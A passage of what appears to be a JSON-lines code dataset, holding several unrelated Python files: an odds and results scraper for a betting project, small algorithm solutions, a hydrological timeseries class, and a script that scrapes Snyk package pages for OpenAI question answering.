float]:\n # get the html\n url = f\"https://www.diretta.it/partita/{match_id}\"\n total1, totalX, total2 = 0, 0, 0\n count1, countX, count2 = 0, 0, 0\n if driver is None:\n browser = get_driver(config.browser)\n else:\n browser = driver\n browser.get(url)\n time.sleep(2)\n html = browser.page_source\n # return the soup\n soup = BeautifulSoup(html, 'html.parser')\n # get the odds\n rows = soup.find_all(\"div\", class_='oddsRowContent')\n for row in rows:\n try:\n odds1 = float(row.find(\"span\", class_='cell o_1').text[1:])\n oddsx = float(row.find(\"span\", class_='cell o_0').text[1:])\n odds2 = float(row.find(\"span\", class_='cell o_2').text[1:])\n total1 += odds1\n totalX += oddsx\n total2 += odds2\n count1 += 1\n countX += 1\n count2 += 1\n except:\n pass\n try:\n return round(total1 / count1, 2), round(totalX / countX, 2), round(total2 / count2, 2)\n except:\n return 0, 0, 0\n\n\ndef matches_to_csv(matches: List[Match], filename: str):\n with open(filename, 'w') as f:\n f.write(\"id,date,time,home_team,away_team,1,X,2\\n\")\n for match in matches:\n f.write(\n f\"{match.match_id},{match.date},{match.time},{match.home_team},{match.away_team},{match.odd1},{match.oddX},{match.odd2}\\n\")\n\n\ndef matches_to_json(matches: List[Match], filename: str):\n with open(filename, 'w') as f:\n f.write(\"{\\n\")\n for i, match in enumerate(matches):\n f.write(f\"\\\"{match.match_id}\\\": {{\\n\")\n f.write(f\"\\\"date\\\": \\\"{match.date}\\\",\\n\")\n f.write(f\"\\\"time\\\": \\\"{match.time}\\\",\\n\")\n f.write(f\"\\\"home_team\\\": \\\"{match.home_team}\\\",\\n\")\n f.write(f\"\\\"away_team\\\": \\\"{match.away_team}\\\",\\n\")\n f.write(f\"\\\"homeodds\\\": {match.odd1},\\n\")\n f.write(f\"\\\"X\\\": {match.oddX},\\n\")\n f.write(f\"\\\"awayodds\\\": {match.odd2}\\n\")\n if i == len(matches) - 1:\n f.write(\"}\\n\")\n else:\n f.write(\"},\\n\")\n f.write(\"}\\n\")\n\n\ndef get_latest_round(championship: str, driver: webdriver.Firefox = None) -> int:\n soup = get_soup(f\"{championships[championship]}calendario/\", driver=driver)\n matches, round = get_matches(soup, driver=driver)\n matches_to_json(matches, f\"matches/{championship}.json\")\n\n\ndef do_scraping():\n #driver = webdriver.Firefox()\n driver = get_driver(config.browser)\n for championship in championships:\n get_latest_round(championship, driver=driver)\n driver.quit()\n\n\ndef getMatchResult(match_id: str, driver: webdriver.Firefox = None) -> str:\n '''\n Returns the result of the match with the given id.\n '''\n\n # open the results.json file to check if the match results was already scraped\n with open('matches/results.json', 'r') as f:\n results = json.load(f)\n\n # check if the match result was already scraped\n if match_id in results:\n return results[match_id], driver\n\n # else, scrape the result and save it in the results.json file\n\n # get the driver\n if driver is None:\n #driver = webdriver.Firefox()\n driver = get_driver(config.browser)\n url = f\"https://www.diretta.it/partita/{match_id}\"\n driver.get(url)\n time.sleep(1)\n html = driver.page_source\n soup = BeautifulSoup(html, 'html.parser')\n result = soup.find(\"div\", class_=\"detailScore__wrapper\").text\n # save the result in the results.json file, but only if the match is finished\n if result != \"-\":\n results[match_id] = result\n with open('matches/results.json', 'w') as f:\n json.dump(results, f)\n return result, driver\n\n\ndef checkBet(bet_filename: str, driver: webdriver.Firefox = None) -> int:\n '''\n Checks the bet with the given filename.\n Returns -1 if the bet is not finished yet, 0 if the bet is lost, and 1 if the bet is a winning one.\n '''\n # read the bet\n with open(bet_filename, 'r') as f:\n bet = json.load(f)\n\n # get the matches\n matches = {}\n result = 1\n for match in bet[\"bets\"]:\n match_id = match[\"match_id\"]\n day = match[\"day\"]\n month = match[\"month\"]\n hour = match[\"time\"]\n hour, minute = hour.split(\":\")\n hour, day, month = int(hour), int(day), int(month)\n # get today's date\n today = datetime.datetime.today()\n if today.month < month or (today.month == month and today.day < day) or (today.month == month and today.day == day and today.hour < hour + 2):\n matches[match_id] = \"-\"\n else:\n # get the match result (only if it has been played)\n matches[match_id], driver = getMatchResult(match_id, driver=driver)\n if matches[match_id] == \"-\" and result != 0: # the match is not finished yet\n result = -1\n elif matches[match_id] != \"-\":\n home_score, away_score = matches[match_id].split(\"-\")\n home_score, away_score = int(home_score), int(away_score)\n # this match is won\n if home_score > away_score and match[\"bet\"] == \"1\":\n continue\n # this match is won\n elif home_score == away_score and match[\"bet\"] == \"X\":\n continue\n # this match is won\n elif home_score < away_score and match[\"bet\"] == \"2\":\n continue\n else: # this match is lost\n result = 0\n # all the matches are won\n return result, driver\n\n\ndef getBetsResult(bet_blockchain: List[Tuple[str, str, str]]) -> None:\n '''\n Given a list of bets, checks the result of each bet and saves it in the bet json file.\n The list of bets is given as a list of tuples (hash, address of who made the bet, block number of the block that added the bet).\n '''\n # get the list of the bets on the server\n bet_files = os.listdir(config.BET_FOLDER)\n driver = None\n for hash, _, _ in bet_blockchain:\n # if the bet is on the server, scrape the result (if not already done)\n if hash+\".json\" in bet_files:\n # get the json of the bet\n with open(config.BET_FOLDER.joinpath(hash+\".json\"), \"r\") as f:\n bet_json = json.load(f)\n # get the result of the bet (if exists)\n result = bet_json.get(\"result\")\n # if the result is not already scraped, scrape it\n result_scraped, driver = checkBet(\n config.BET_FOLDER.joinpath(hash+\".json\"), driver=driver)\n if result is None or (result != result_scraped and result == -1):\n # save the result in the json file\n bet_json[\"result\"] = result_scraped\n with open(config.BET_FOLDER.joinpath(hash+\".json\"), \"w\") as f:\n json.dump(bet_json, f)\n if driver is not None:\n driver.close()\n\n\ndef get_driver(browser: str):\n if browser == \"firefox\":\n return webdriver.Firefox()\n elif browser == \"chrome\":\n return webdriver.Chrome()\n","repo_name":"bonjon/DistributedBetting","sub_path":"py/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":9747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"42178560792","text":"from django.test import TestCase\n\n# Create your tests here.\nfrom .models import TaskModel\n\ndef print_task(task):\n print(f'''[{task.id} - {task.name}] \nlist:({task.list.id} - {task.list.name})\npriority:({task.priority.id} - {task.priority.name})''')\n \nprint(\"\\t### Tasks ###\")\n\n\ndef testino():\n\n # get task with related models\n task = TaskModel.objects\\\n .select_related('priority')\\\n .first()\n # priority joined in the query\n # list queried again\n print_task(task)\n# testino()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nprint()","repo_name":"Akraminum/TodoApiProject-DRF","sub_path":"Tasks/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19120652663","text":"#! /usr/bin/env python\n\n\"\"\"This module lists constants that are used by the target coverage tool\n\"\"\"\n\nfrom matplotlib.path import Path\n\n# Matplotlib info\nCODES_ONE_SCA = [Path.MOVETO, Path.LINETO, Path.LINETO, Path.LINETO, Path.CLOSEPOLY]\n\n# List of instruments the tool supports\nSUPPORTED_INSTRUMENTS = ['nircam']\n\n# Reference apertures for plotting\nREFERENCE_APERTURES = {'nircam': 'NRCALL_FULL',\n 'niriss': 'NIS_CEN'}\n","repo_name":"mrobberto/ARTIFACTS","sub_path":"APT_tools/target_coverage_tool/target_coverage_tool/utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22167621048","text":"import sys; input = sys.stdin.readline\r\n\r\ndef sum_binom(n, r, k):\r\n ans = 0; f = 1\r\n for i in range(r):\r\n f *= n-i; f //= i+1; ans += f\r\n if ans > k: break\r\n return ans\r\n\r\nfor _ in range(int(input())):\r\n n, k = map(int, input().split())\r\n lo, hi = 0, n\r\n while hi-lo > 1:\r\n mid = (lo+hi)//2\r\n if sum_binom(mid, k, n) < n: lo = mid\r\n else: hi = mid\r\n print('Impossible' if lo > 31 else lo+1)","repo_name":"RussellDash332/kattis","sub_path":"src/Power Eggs/powereggs.py","file_name":"powereggs.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"40"} +{"seq_id":"21414469623","text":"#\r\n# Date : 2018.12.06 thu\r\n# Author : 글로벌리더십학부 21800633 장은준\r\n# Purpose : 머지소트 구현 프로그램.\r\n#\r\n\r\ndef mergeSort(list1, list2):\r\n rlist = list1 + list2 # 리스트 병합\r\n rlist.sort() # 정렬\r\n\r\n count = 0\r\n i = 0\r\n while i < len(rlist): # 중복되는 값들을 없애기 위해서 반복문\r\n j = i + 1\r\n while j < len(rlist): # 해당 원소와 비교해 2개이상 같은 값이 나오면 삭제해야함.\r\n if rlist[i] == rlist[j]:\r\n count+=1\r\n if count > 1:\r\n rlist.pop(j) # 삭제\r\n j-=1\r\n j+=1\r\n\r\n count = 0\r\n i+=1\r\n \r\n return rlist\r\n\r\n","repo_name":"SilverJun/PythonPractice","sub_path":"mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34676554201","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n \n hashmap = {}\n \n for x, num in enumerate(nums):\n diff = target - num\n if diff in hashmap:\n return [hashmap[diff], x]\n else:\n hashmap[num] = x\n return False\n\n #Complexity O(n)\n\n #Bruteforce O(n^2)","repo_name":"kritanu/coding-solutions","sub_path":"arrays_and_strings/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9876344082","text":"import csv\nimport datetime\nfrom math import floor\nfrom os.path import basename\n\nimport pandas\nfrom numpy import nan, isnan\n\nfrom stldecompose import decompose\n\n\nclass FixedIndexTimeseries(object):\n \"\"\"This class implements a wrapper for 5-day, decadal and monthly timeseries.\n\n FixedIndex means, that each year has the same number of periods and that every period takes the same position in\n every year, e.g. monthes or semi-monthes etc. It does not work for timeseries with periods, that strictly consist\n of the same number of days and as such, might overlap New Year. This class is based on pandas.Series objects.\n\n The timeseries are indexed by the first day of a period, e.g. 2007/5/11 for the 2nd decade in May 2007.\n The annual index is defined as the position of the period within the year, e.g. 5 for the 2nd decade in February\n Timeseries can be loaded from a csv file with the subclass FixedIndexTimeseriesCSV\n\n Attributes:\n timeseries: a pandas.Series object with data indexed by the first day of a period as datetime.date object.\n label: an optional, custom label for the object.\n mode: The frequency mode of the timeseries. Either p (5-day), d (decadal), m (monthly)\n maxindex: the maximum value that annualindex can have for the mode\n \"\"\"\n\n def __init__(self, series, mode, label=None):\n \"\"\"Initialises an instance of the FixedIndexTimeseries Class\n\n Args:\n series: A pandas.Series object, where the index is datetime.date objects.\n mode: The frequency that series is expected to have, either: p (5-day), d (decadal), m (monthly)\n label: An optional label for the timeseries. Default is None: uses the label that is found in the series object.\n\n Returns:\n An instance of FixedIndexTimeseries\n\n Raises:\n ValueError: When the argument given for mode is not recognized.\n ModeError: when the mode given as argument and the property of series do not fit. Does only recognize if\n series if of higher frequency than indicated by mode.\n \"\"\"\n self.mode = mode\n self.yearswitch = False\n if mode == 'd':\n self.maxindex = 36\n self.period = 10\n self.periodname=\"decade\"\n elif mode == \"p\":\n self.maxindex = 72\n self.period = 5\n self.periodname=\"pentade\"\n elif mode == \"m\":\n self.maxindex = 12\n self.period = 30\n self.periodname=\"month\"\n elif mode == \"dl\":\n self.maxindex = 365\n self.period = 1\n self.periodname=\"daily\"\n else:\n try:\n res = mode.split(\"-\")\n self.yearswitch = False if int(res[1])>=int(res[0]) else True #does the season definition overlap new year?\n self.begin = datetime.date(1,int(res[0]),1)\n self.end = (datetime.date(1,int(res[1]),1) + datetime.timedelta(32)).replace(day=1) + datetime.timedelta(-1) #Ugly solution to get last day of the month\n self.maxindex = 1\n self.period = (self.end - self.begin).days\n self.periodname = \"season\"\n except:\n raise ValueError(\"The given mode was not recognized. Check the docstring of the class for details.\")\n\n if self.__check_timeseries(series):\n self.timeseries = series.sort_index()\n else:\n raise self.__ModeError(\n \"The given series can not be recognized as a timeseries with frequency mode %s\" % self.mode)\n\n if label == None:\n self.label = self.timeseries.name\n else:\n self.label = label\n\n self.__mode_order = ['dl', 'p', 'd', 'm']\n\n def __check_timeseries(self, series):\n for i, item in series.iteritems():\n date = self.firstday_of_period(i.year, self.convert_to_annual_index(i))\n if not date == i:\n return False\n return True\n\n def firstday_of_period(self, year, annual_index):\n \"\"\"Returns the first day of a period given by the year and the annual index of the period\n\n Decadal: first day of period (2007,3) --> datetime.date(2007,1,21)\n\n Args:\n year: The year\n annual_index: The index of the period within a year. 0 < annual_index < maxindex (e.g. 5-day: 72)\n\n Returns:\n datetime.date(y,m,d) of the first day of the period described by the year and annnual index.\n\n Raises:\n ValueError: When the annual index is invalid or outside the valid range defined by the mode\n \"\"\"\n\n if not 0 < annual_index < self.maxindex + 1 or not type(annual_index) == int:\n raise ValueError(\"Annual index is not valid: 0 < index < %s for mode=%s\" % (self.maxindex + 1, self.mode))\n\n if self.maxindex == 1:\n return datetime.date(year, self.begin.month, self.begin.day)\n elif self.maxindex == 365:\n return datetime.date(year, 1, 1) + datetime.timedelta(annual_index - 1)\n else:\n month = int((annual_index - 1) / (float(self.maxindex) / 12)) + 1\n day_start = int(((annual_index - 1) % (float(self.maxindex) / 12)) * self.period + 1)\n return datetime.date(year, month, day_start)\n\n def lastday_of_period(self, year, annual_index):\n \"\"\"Returns the last day of a period given by the year and the annual index of the period\n\n Decadal: last day of period (2007,3) --> datetime.date(2007,1,31)\n\n Args:\n year: The year\n annual_index: The index of the period within a year. 0 < annual_index < maxindex (e.g. 5-day: 72)\n\n Returns:\n datetime.date(y,m,d) of the last day of the period described by the year and annnual index.\n\n Raises:\n ValueError: When the annual index is invalid or outside the valid range defined by the mode\n \"\"\"\n\n if not 0 < annual_index < self.maxindex + 1 or not type(annual_index) == int:\n raise ValueError(\"Annual index is not valid: 0 < index < %s for mode=%s\" % (self.maxindex + 1, self.mode))\n\n if self.maxindex == 1:\n return datetime.date(year, self.end.month, self.end.day)\n else:\n annual_index = annual_index+1\n if annual_index>self.maxindex:\n annual_index = 1\n year = year + 1\n return self.firstday_of_period(year,annual_index)-datetime.timedelta(1)\n\n @staticmethod\n def doy(date):\n return date.timetuple().tm_yday\n\n def convert_to_annual_index(self, date):\n \"\"\"Returns the annual_index of a datetime.date object\n\n Decadal: datetime.date(2007,1,21) --> first day of period (2007,3)\n datetime.date(2007,1,30) --> first day of period (2007,3)\n datetime.date(2007,2,1) --> first day of period (2007,4)\n Is the reverse function of firstday_of_period(year,annual_index)\n\n Args:\n date: A datetime.date object\n\n Returns:\n int: the annual index of the period that the datetime.date is member of.\n\n Raises:\n None\n \"\"\"\n if self.maxindex == 1:\n if self.doy(date) <= self.doy(self.end): #replaces: if self.doy(self.begin) <= self.doy(date) <= self.doy(self.end):\n return 1\n elif self.yearswitch:\n return 1\n else:\n return 2\n elif self.maxindex == 365:\n return self.doy(date)\n else:\n return int((date.month - 1) * (float(self.maxindex) / 12)) + ((min(date.day,30) - 1) / self.period) + 1\n\n def shift_date_by_period(self, date, shift):\n \"\"\"Shifts a datetime.date object by the given number of periods.\n\n E.g. decadal: Shifting datetime.date(2007,1,25)\n by -3 gives datetime.date(2006,12,21)\n Remark: The input date is fist converter to the first day of the period it is member of.\n\n Args:\n date: A datetime.date object\n shift: An integer corresponding to the periods that the date should be shifted.\n Negative value: back in time. Positive value: forward in time\n\n Returns:\n datetime.date: the shifted date\n\n Raises:\n None\n \"\"\"\n newindex = self.convert_to_annual_index(date) + shift\n # Correcting for shifts between years:\n if newindex < 1:\n factor = int(floor((newindex - 1) / self.maxindex))\n return self.firstday_of_period(date.year + 1 * factor, newindex - self.maxindex * factor)\n elif newindex > self.maxindex:\n factor = int(floor((newindex - 1) / self.maxindex))\n return self.firstday_of_period(date.year + int(1 * factor), newindex - self.maxindex * factor)\n else:\n return self.firstday_of_period(date.year, newindex)\n\n def get_value(self, year, annualindex):\n \"\"\"Returns a value by year and annualindex\n\n Args:\n FixedIndexTimeseriesObj: a FixedIndexTimeseries instance\n year (int): the year from which data is requested\n annualindex (int): the index from which data is requested\n\n Returns:\n a pandas Series object with a single value of the same format as the class attribute timeseries\n\n Raises:\n None\n \"\"\"\n date = self.firstday_of_period(year, annualindex)\n return self.timeseries.reindex([date])\n\n def data_by_index(self, annualindex):\n \"\"\"Returns all data in FixedIndexTimeseries by annualindex.\n\n Args:\n FixedIndexTimeseriesObj: a FixedIndexTimeseries instance\n annualindex (int): the index from which data is requested\n\n Returns:\n a pandas Series object of the same format as the class attribute timeseries\n\n Raises:\n None\n \"\"\"\n\n indexrange = ([annualindex] if type(annualindex) == int else annualindex)\n\n if not all([(0 < i < self.maxindex+1) for i in indexrange]):\n raise ValueError(\"The provided annualindex is outside the range %s < annualindex < %s\" %(0,self.maxindex+1))\n out = []\n years = range(min(self.timeseries.index).year, max(self.timeseries.index).year + 1)\n\n for index in indexrange:\n dates = map(self.firstday_of_period, years, len(years) * [index])\n try:\n data = self.timeseries.reindex(dates).dropna()\n out.append(data)\n except:\n out.append([])\n if type(annualindex) == int:\n out = out[0]\n\n return out\n\n def data_by_year(self, year):\n \"\"\"Returns all data in FixedIndexTimeseries by year\n\n Args:\n FixedIndexTimeseriesObj: a FixedIndexTimeseries instance\n year (int): the year from which data is requested\n\n Returns:\n a pandas Series object of the same format as the class attribute timeseries\n Raises:\n None\n \"\"\"\n\n out = list()\n for i in range(1,self.maxindex+1):\n date = self.firstday_of_period(year=year,annual_index=i)\n val = self.timeseries.reindex([date])\n out.append(val)\n return pandas.concat(out)\n\n def norm(self, annualindex=None):\n \"\"\"Given a FixedIndexTimeseries, returns the average (norm) value for each period of the year or the specified period\n\n Args:\n FixedIndexTimeseriesObj: a FixedIndexTimeseries instance\n annualindex: None (default), or the index or list of indexes of the period(s) for which the norm should be computed.\n Otherwise the norms for all periods are computed.\n\n Returns:\n A value or list of values describing the norm in the same order as argument annualindex\n\n Raises:\n None\n \"\"\"\n\n norm = []\n if annualindex:\n indexrange = ([annualindex] if type(annualindex) == int else annualindex)\n else:\n indexrange = range(1, self.maxindex + 1)\n\n for index in indexrange:\n # TODO dates = map(FixedIndexTimeseriesObj.firstday_of_period, years, len(years) * [index])\n #norm.append(FixedIndexTimeseriesObj.timeseries[dates].mean())\n norm.append(self.data_by_index(index).mean())\n if type(annualindex) == int:\n return norm[0]\n else:\n return norm\n\n def max(self, annualindex=None):\n \"\"\"Given a FixedIndexTimeseries, returns the max value for each period of the year or the specified period\n\n Args:\n FixedIndexTimeseriesObj: a FixedIndexTimeseries instance\n annualindex: None (default), or the index or list of indexes of the period(s) for which the max value should be computed.\n Otherwise the max values for all periods are computed.\n\n Returns:\n A value or list of values describing the maximum in the same order as argument annualindex\n\n Raises:\n None\n \"\"\"\n\n out = []\n if annualindex:\n indexrange = ([annualindex] if type(annualindex) == int else annualindex)\n else:\n indexrange = range(1, self.maxindex + 1)\n\n for index in indexrange:\n # TODO dates = map(FixedIndexTimeseries.firstday_of_period, years, len(years) * [index])\n #out.append(FixedIndexTimeseries.timeseries[dates].max())\n out.append(self.data_by_index(index).max())\n if type(annualindex) == int:\n return out[0]\n else:\n return out\n\n def min(self, annualindex=None):\n \"\"\"Given a FixedIndexTimeseries, returns the min value for each period of the year or the specified period\n\n Args:\n FixedIndexTimeseriesObj: a FixedIndexTimeseries instance\n annualindex: None (default), or the index or list of indexes of the period(s) for which the min value should be computed.\n Otherwise the min values for all periods are computed.\n\n Returns:\n A value or list of values describing the minimum in the same order as argument annualindex\n\n Raises:\n None\n \"\"\"\n\n out = []\n if annualindex:\n indexrange = ([annualindex] if type(annualindex) == int else annualindex)\n else:\n indexrange = range(1, self.maxindex + 1)\n\n for index in indexrange:\n # TODO dates = map(FixedIndexTimeseries.firstday_of_period, years, len(years) * [index])\n #out.append(FixedIndexTimeseries.timeseries[dates].min())\n out.append(self.data_by_index(index).min())\n if type(annualindex) == int:\n return out[0]\n else:\n return out\n\n def stdev_s(self, annualindex=None):\n \"\"\"Given a FixedIndexTimeseries, returns the stdev.sample value for each period of the year or the specified period\n\n Args:\n FixedIndexTimeseriesObj: a FixedIndexTimeseries instance\n annualindex: None (default), or the index or list of indexes of the period(s) for which the stdev.sample value should be computed.\n Otherwise the stdev.sample values for all periods are computed.\n\n Returns:\n A value or list of values describing the stdev.sample in the same order as argument annualindex\n\n Raises:\n None\n \"\"\"\n out = []\n years = range(min(self.timeseries.index).year, max(self.timeseries.index).year + 1)\n if annualindex:\n indexrange = ([annualindex] if type(annualindex) == int else annualindex)\n else:\n indexrange = range(1, self.maxindex + 1)\n\n for index in indexrange:\n dates = map(self.firstday_of_period, years, len(years) * [index])\n try:\n out.append(self.timeseries[dates].std())\n except:\n out.append(nan)\n if type(annualindex) == int:\n return out[0]\n else:\n return out\n\n def trend(self, label=None):\n \"\"\"Returns the trend component of the timeseries\n\n Args:\n None\n Returns:\n A FixedIndexTimeseries Object\n\n Raises:\n None\n \"\"\"\n dec = decompose(self.timeseries.values, period=self.maxindex)\n return FixedIndexTimeseries(pandas.Series(dec.trend, index=self.timeseries.index), mode=self.mode, label=self.label if label is None else label)\n\n def seasonal(self, label=None):\n \"\"\"Returns the seasonal component of the timeseries\n\n Args:\n None\n Returns:\n A FixedIndexTimeseries Object\n\n Raises:\n None\n \"\"\"\n dec = decompose(self.timeseries.values, period=self.maxindex)\n return FixedIndexTimeseries(pandas.Series(dec.seasonal, index=self.timeseries.index), mode=self.mode, label=self.label if label is None else label)\n\n def residual(self, label=None):\n \"\"\"Returns the residual (timeseries without trend and seasonal component) component of the timeseries\n\n Args:\n None\n Returns:\n A FixedIndexTimeseries Object\n\n Raises:\n None\n \"\"\"\n dec = decompose(self.timeseries.values, period=self.maxindex)\n return FixedIndexTimeseries(pandas.Series(dec.resid, index=self.timeseries.index), mode=self.mode, label=self.label if label is None else label)\n\n def detrend(self, label=None):\n \"\"\"Returns the timeseries without trend component\n\n Args:\n None\n Returns:\n A FixedIndexTimeseries Object\n\n Raises:\n None\n \"\"\"\n dec = decompose(self.timeseries.values, period=self.maxindex)\n return FixedIndexTimeseries(pandas.Series(dec.resid, index=self.timeseries.index)+pandas.Series(dec.seasonal, index=self.timeseries.index), mode=self.mode, label=self.label if label is None else label)\n\n def derivative(self, label=None):\n \"\"\"Returns the derivative of the timeseries\n\n Args:\n None\n Returns:\n A FixedIndexTimeseries Object\n\n Raises:\n None\n \"\"\"\n diff = self.timeseries.diff()\n delta_days = [(x-y).days for x, y in zip(self.timeseries.index, self.timeseries.index[1:])]\n derivative = -diff.drop(diff.index[0])/delta_days\n return FixedIndexTimeseries(derivative, mode=self.mode, label=self.label if label is None else label)\n\n def downsample(self, mode, label=None):\n \"\"\"Returns a timeseries with lower frequency than the original\n\n Args:\n mode: The mode of the target timeseries. Needs to be of lower frequency than the original timeseries.\n Returns:\n A FixedIndexTimeseries Object\n\n Raises:\n ValueError: If the timeseries can not be resampled to the requested frequency. Either it is is already of lowest mode=seasonal or the target mode is of higher frequency than the originalo mode\n \"\"\"\n if len(self.mode) > 2:\n raise ValueError('The timeseries can not be downsampled')\n if len(mode) > 1:\n self.__mode_order.append(mode)\n\n if self.__mode_order.index(mode) <= self.__mode_order.index(self.mode):\n raise ValueError('The target mode is of same or higher frequency than the source mode. Only downsampling is allowed.')\n else:\n dailyindex = pandas.date_range(self.timeseries.index.values[0], self.timeseries.index.values[-1]+datetime.timedelta(self.period+1), freq='D')\n dailytimeseries = self.timeseries.reindex(dailyindex).interpolate('zero',limit=self.period+1).interpolate('linear',limit=self.period+1)\n dummyInstance = FixedIndexTimeseries(pandas.Series(), mode=mode)\n beginyear = self.timeseries.index.values[0].year\n endyear = self.timeseries.index.values[-1].year\n newindex = [dummyInstance.firstday_of_period(y, i) for y in range(beginyear, endyear+1) for i in range(1, dummyInstance.maxindex+1)]\n values = [nan] * len(newindex)\n for i,date in enumerate(newindex):\n lastday = dummyInstance.lastday_of_period(date.year+dummyInstance.yearswitch*1,dummyInstance.convert_to_annual_index(date))\n try:\n values[i] = dailytimeseries.reindex(pandas.date_range(date,lastday,freq='D')).mean(skipna=False)\n except:\n pass\n return FixedIndexTimeseries(pandas.Series(values,newindex),mode=mode, label=self.label if label is None else label)\n\n def multiply(self, FixedIndexTimeseries_obj, label=None):\n \"\"\"Returns the timeseries multiplied by another timeseries\n\n Args:\n A FixedIndexTimeseries Object of the same mode.\n Returns:\n A FixedIndexTimeseries Object\n\n Raises:\n ModeError: If the mode of both timeseries is different.\n \"\"\"\n if self.mode is not FixedIndexTimeseries_obj.mode:\n raise self.__ModeError(\"Both timeseries must be of the same mode\")\n\n res = self.timeseries.multiply(FixedIndexTimeseries_obj.timeseries)\n return FixedIndexTimeseries(res, mode = self.mode, label=self.label if label is None else label)\n\n class __ModeError(Exception):\n pass\n\n\n\nclass FixedIndexTimeseriesCSV(FixedIndexTimeseries):\n \"\"\"Is a subclass of FixedIndexTimeseries. Can be initialised with a path of a csv file.\n\n Description of required csv-file format: rows contain the data of 1 year.\n The first column contains the year of each row. The length of the rows corresponds\n to number of periods of the chosen mode in each year, additional columns will be ignored\n e.g. monthly:\n 1995,x1,x2,x3,x4,x5,x6,x7,x8,x9,x10,x11,x12\n 1996,...\n Strings are loaded as NaN\n\n \"\"\"\n\n def __init__(self, csv_filepath, mode, label=None):\n self.mode = mode\n if mode == 'd':\n self.maxindex = 36\n self.period = 10\n self.periodname = \"decade\"\n elif mode == \"p\":\n self.maxindex = 72\n self.period = 5\n self.periodname = \"pentade\"\n elif mode == \"m\":\n self.maxindex = 12\n self.period = 30\n self.periodname = \"month\"\n elif mode == \"dl\":\n self.maxindex = 365\n self.period = 1\n self.periodname=\"daily\"\n else:\n try:\n res = mode.split(\"-\")\n self.begin = datetime.date(1, int(res[0]), 1)\n self.end = datetime.date(1, int(res[1]) + 1, 1) - datetime.timedelta(1)\n self.maxindex = 1\n self.period = (self.end - self.begin).days\n self.periodname = \"season\"\n except:\n raise ValueError(\"The given mode was not recognized. Check the docstring of the class for details.\")\n\n\n series = self.load_csv(csv_filepath)\n FixedIndexTimeseries.__init__(self, series, mode, label)\n\n def load_csv(self, filepath):\n \"\"\"loads array-like timeseries data from .csv into indexed pandas series\n\n Description of required csv-file format: rows contain the data of 1 year.\n The first column contains the year of each row. The length of the rows corresponds\n to number of periods of the chosen mode in each year, additional columns will be ignored\n e.g. monthly:\n 1995,x1,x2,x3,x4,x5,x6,x7,x8,x9,x10,x11,x12\n 1996,...\n Strings are loaded as NaN\n\n Args:\n filepath: the path to a csv file\n\n Returns:\n pandas.Series objects\n\n Raises:\n ValueError: The yearnumber in the first column of the csv could not be recognized.\n \"\"\"\n\n reader = csv.reader(open(filepath, 'r'))\n intlist = []\n datelist = []\n for row in reader:\n for i in range(1, self.maxindex + 1):\n try:\n intlist.append(float(row[i]))\n except:\n intlist.append(nan)\n try:\n date = self.firstday_of_period(year=int(row[0]), annual_index=i)\n except ValueError:\n raise ValueError(\"CSV format error: The first column must contain years\")\n datelist.append(date)\n\n return pandas.Series(data=intlist, index=datelist, name=basename(filepath))\n","repo_name":"hydrosolutions/hydromet-forecasting","sub_path":"hydromet_forecasting/timeseries.py","file_name":"timeseries.py","file_ext":"py","file_size_in_byte":25507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9274483396","text":"import json\nimport openai\nfrom bs4 import BeautifulSoup as bs\nimport requests\nimport config\nimport time\n\n# Reading the API key from a file\nservice_key = config.api_key\nopenai.api_key = service_key\n\n\ndef handle_answer(q, file_id):\n\ttry:\n\t\tanswer = openai.Answer.create(\n\t\t\tsearch_model=\"davinci\", \n\t\t\tmodel=\"davinci\", \n\t\t\tquestion=q, \n\t\t\tfile=file_id, \n\t\t\texamples_context=\"In 2017, U.S. life expectancy was 78.6 years.\", \n\t\t\texamples=[[\"What is human life expectancy in the United States?\", \"78 years.\"]], \n\t\t\tmax_rerank=200,\n\t\t\tmax_tokens=500,\n\t\t\tstop=[\"\\n\", \"<|endoftext|>\"]\n\t\t)\n\t\t\t\n\texcept Exception as e:\n\t\tanswer = False\n\t\n\treturn answer\n\t\ndef handle_package(pkg_name):\n\t# Get the URL\n\tURL = 'https://snyk.io/advisor/npm-package/' + pkg_name\n\tURL_dep = URL + '#dependencies'\n\tr = requests.get(URL)\n\tr_dep = requests.get(URL_dep)\n\t\n\tif r.status_code == 200:\n\n\t\tsoup = bs(r.text, \"html.parser\")\n\t\tsoup_dep = bs(r_dep.text, \"html.parser\")\n\n\t\t# Parse the HTML for the data\n\t\tdata_set = []\n\t\tdependencies = ['List of package dependencies']\n\n\t\tfor tag in soup.find_all('div', class_='intro'):\n\t\t\tfor ele in tag.find_all('h2'):\n\t\t\t\tmsg = f\"{pkg_name} is {ele.text}\"\n\t\t\t\tdata_set.append(msg)\n\t\tfor tag in soup.find_all('div', class_='number'):\n\t\t\tdata_set.append(tag.text)\n\t\tfor tag in soup.find_all('ul', class_='scores'):\n\t\t\tfor ele in tag.find_all('li'):\n\t\t\t\tdata_set.append(ele.text)\n\t\tfor tag in soup.find_all('dl', class_='stats'):\n\t\t\tfor ele in tag.find_all('div'):\n\t\t\t\ttext = ele.text.replace('\\n', '')\n\t\t\t\ttext = \" \".join(text.split())\n\t\t\t\tdata_set.append(text)\n\t\t# Readme\n\t\tfor tag in soup.find('div', {'id': 'readme'}):\n\t\t\ttext = tag.text.replace('\\n', '')\n\t\t\ttext = \" \".join(text.split())\n\t\t\tdata_set.append(text)\n\t\t# Dependencies\n\t\tfor tag in soup_dep.find_all('div', 